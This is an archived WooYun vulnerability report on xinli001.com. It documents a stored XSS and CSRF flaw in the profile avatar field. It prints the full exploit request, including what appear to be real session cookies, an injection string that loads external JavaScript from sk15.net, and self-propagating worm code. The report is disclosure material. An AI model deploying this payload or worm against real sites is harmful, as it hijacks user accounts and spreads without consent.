乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开
壹心理,best of best,做国内最好的心理学品牌。
存储型XSS:
POST /ajax/update-user-profile HTTP/1.1Host: www.xinli001.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://www.xinli001.com/user/settingContent-Length: 49Cookie: lzstat_uv=38348821501812510113|2646296@3462520@3562675@3597499; Hm_lvt_d64469e9d7bdbf03af6f074dffe7f9b5=1446107039,1446179415,1446188216,1446432295; laravel_session=eyJpdiI6IjNsNzN1clJXK25IUDBtY3BrZVRja3c9PSIsInZhbHVlIjoiWVVWbG94b3YzTXNCc0hPY3BjUXdpczJaVGZiSVBnSFdYZ1ArMDZmbzNBUVpJdEtKWHFQRDM2Z3IySEJMRmczZEZtQlIrZGYwMVN1UTA3VFlBTm8xS0E9PSIsIm1hYyI6IjIxY2FkYTkyMmYwYjc5ZjAwZTZjMzY4ZWQ5NWM4ZDQ0MmJmZTY0MzMwYTczNjI5MzQ4NWEzNTE1OWU1NmE1N2IifQ%3D%3D; sessionid=6pww0c6ccqhi193nijiwbtu8yypoitxf; expires=Fri, 06-Nov-2015 06:14:39 GMT; bdshare_firstime=1446191998449; common_auth_key=ef825bd915065102b725a482c9792bae; lzstat_ss=1919308479_1_1446473629_2646296|1591989281_2_1446461522_3597499|988365104_1_1446461581_3462520; Hm_lpvt_d64469e9d7bdbf03af6f074dffe7f9b5=1446444830Connection: keep-alivePragma: no-cacheCache-Control: no-cacheavatar=http%3A%2F%2Fwww.sk15.net%2Fimg%2Fsk15.ico
参数avatar,即是头像地址,可写入存储型XSS。当然,这个接口也是CSRF,没有TOKEN验证。所以我们把avatar写成这样http://www.sk15.net/img/sk15.ico"><script src="http://www.sk15.net/js/sk15.js"></script><加载外部的JS。外部JS代码如下:
(function(){ /* * 蠕虫开始,访问者CSRF提交修改头像 */ $.ajax({ type: "POST", url: "/ajax/update-user-profile", data: {avatar:'http://www.sk15.net/img/sk15.ico"><script src="http://www.sk15.net/js/sk15.js"></script><'}, dataType: "json", success: function(data){ } }); })();
这样,我在社区进行留言等等方式,只要用户访问到,即将用户的头像改成我们写的存储型XSS,进行蠕虫。
严格过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-07 14:44
漏洞Rank:2 (WooYun评价)
暂无